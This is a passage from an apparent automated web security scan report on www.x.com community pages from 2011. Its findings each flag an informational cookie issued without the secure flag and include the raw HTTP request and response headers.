Host:   https://www.x.com
Path:   /community/ppx/xspaces/digital_goods

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/digital_goods HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:39 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034383b31342c323035313b31342c323131323b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b31342c323030383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:39 GMT; Path=/
Vary: User-Agent
JP: D=155072 t=1313157039623431
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.68. https://www.x.com/community/ppx/xspaces/finance

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/finance

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/finance HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:40 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323034393b31342c323131323b31342c323034383b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b31342c323030393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:40 GMT; Path=/
Vary: User-Agent
JP: D=82568 t=1313157040529050
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.69. https://www.x.com/community/ppx/xspaces/forums

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/forums

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/forums HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=123822 t=1313157052865732
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.70. https://www.x.com/community/ppx/xspaces/gaming

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/gaming

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/gaming HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b31342c323131323b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=82477 t=1313157046859519
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.71. https://www.x.com/community/ppx/xspaces/identity

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/identity

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/identity HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:41 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b31342c323030333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:41 GMT; Path=/
Vary: User-Agent
JP: D=98694 t=1313157041495583
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.72. https://www.x.com/community/ppx/xspaces/innovate

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/innovate

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/innovate HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:48 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:49 GMT; Path=/
Vary: User-Agent
JP: D=172927 t=1313157048855371
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.73. https://www.x.com/community/ppx/xspaces/introduce

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/introduce

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/introduce?view=documents HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:52 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b31342c323232343b31342c323236363b31342c323236383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:52 GMT; Path=/
Vary: User-Agent
JP: D=99978 t=1313157052571521
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.74. https://www.x.com/community/ppx/xspaces/mobile

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:34 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035313b31342c323030393b31342c323030333b31342c323031313b31342c323030373b31342c323031343b31342c323030383b31342c323031303b31342c323031393b31342c323237363b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:35 GMT; Path=/
Vary: User-Agent
JP: D=93891 t=1313157035030578
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.75. https://www.x.com/community/ppx/xspaces/mobile/mecl

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mecl

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mecl HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=118072 t=1313157044365221
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.76. https://www.x.com/community/ppx/xspaces/mobile/mobile_ec

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/mobile/mobile_ec

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/mobile/mobile_ec HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:43 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:44 GMT; Path=/
Vary: User-Agent
JP: D=244511 t=1313157043858374
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.77. https://www.x.com/community/ppx/xspaces/security

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/security

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/security HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:55 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323236393b31342c323232313b31342c323235313b31342c323130303b31342c323038343b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:55 GMT; Path=/
Vary: User-Agent
JP: D=117938 t=1313157055856107
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.78. https://www.x.com/community/ppx/xspaces/social

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/social

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/social HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:47 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035323b31342c323035303b31342c323036313b31342c323035373b31342c323035343b31342c323232343b31342c323236363b31342c323236383b31342c323034393b31342c323034383b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:47 GMT; Path=/
Vary: User-Agent
JP: D=146095 t=1313157047611313
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.79. https://www.x.com/community/ppx/xspaces/subscriptions

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/subscriptions

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/subscriptions HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:53 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323232313b31342c323130303b31342c323036333b31342c323038343b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b31342c323035343b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=123225 t=1313157053998686
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.80. https://www.x.com/community/ppx/xspaces/toolkits

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/toolkits

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/toolkits HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:54 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323235313b31342c323232313b31342c323038343b31342c323130303b31342c323036333b31342c323036323b31342c323035323b31342c323035303b31342c323035373b31342c323036313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:54 GMT; Path=/
Vary: User-Agent
JP: D=92295 t=1313157054626427
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.81. https://www.x.com/community/ppx/xspaces/web_checkout

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b31342c323030373b31342c323031343b31342c323031313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:43 GMT; Path=/
Vary: User-Agent
JP: D=247512 t=1313157042801714
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.82. https://www.x.com/community/ppx/xspaces/web_checkout/nvp

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/nvp

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/nvp HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:44 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323035373b31342c323236363b31342c323035343b31342c323232343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b31342c323035333b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:45 GMT; Path=/
Vary: User-Agent
JP: D=141801 t=1313157044894483
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.83. https://www.x.com/community/ppx/xspaces/web_checkout/soap

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/ppx/xspaces/web_checkout/soap

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/ppx/xspaces/web_checkout/soap HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:50:46 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323036313b31342c323035373b31342c323232343b31342c323236363b31342c323035343b31342c323236383b31342c323034393b31342c323034383b31342c323131323b31342c323035313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:50:46 GMT; Path=/
Vary: User-Agent
JP: D=130212 t=1313157046417943
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.84. https://www.x.com/community/xcommerce-blogs

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs?view=blog HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: https://www.x.com/index.jspa
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: www.x.com
Connection: Keep-Alive
Cookie: JSESSIONID=7FE401956C0FCEA7A6B398FD70CFF9EB.node0; jive.server.info="serverName=www.x.com:serverPort=443:contextPath=:localName=localhost:localPort=9001:localAddr=127.0.0.1"; NSC_xxx.y.dpn-443=44ed4e25151d; jive.recentHistory.-1=31342c323030383b

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:38:42 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323237363b31342c323030383b; Expires=Sun, 11-Sep-2011 13:38:43 GMT; Path=/
Vary: User-Agent
JP: D=97775 t=1313156323515835
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.85. https://www.x.com/community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/07/adobe-to-arm-xcommerce-retailers-with-customer-data-to-help-them-sell-more HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c353939353b33382c363039373b33382c363233383b33382c363238353b33382c363030363b33382c363133383b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:28 GMT; Path=/
Vary: User-Agent
JP: D=114399 t=1313157088244606
Cache-Control: no-cache, private
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
"http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">
<head
...[SNIP]...

2.86. https://www.x.com/community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.x.com
Path:   /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better

Issue detail

The following cookie was issued by the application and does not have the secure flag set:

The cookie does not appear to contain a session token, which may reduce the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /community/xcommerce-blogs/blog/2011/06/08/how-may-we-serve-you-better HTTP/1.1
Host: www.x.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.0 200 OK
Date: Fri, 12 Aug 2011 13:51:27 GMT
Server: Apache-Coyote/1.1
Content-Type: text/html;charset=UTF-8
Content-Language: en-US
Set-Cookie: jive.recentHistory.-1=31342c323037333b31342c323232363b31342c323030323b31342c323135343b31342c323131353b31342c323131313b31342c323134393b31342c323038363b31342c323038323b31342c323030353b33382c363030363b33382c363233383b33382c363039373b33382c363133383b33382c363238353b33382c363330313b3130322c313130363b3130322c333831313b332c35333735313b332c3133373331333b332c35353331393b332c3133363236393b332c38323134383b332c37383732323b332c38313633393b332c3130323736323b332c36373839373b332c38343138313b; Expires=Sun, 11-Sep-2011 13:51:27 GMT; Path=/
Vary: User-Agent
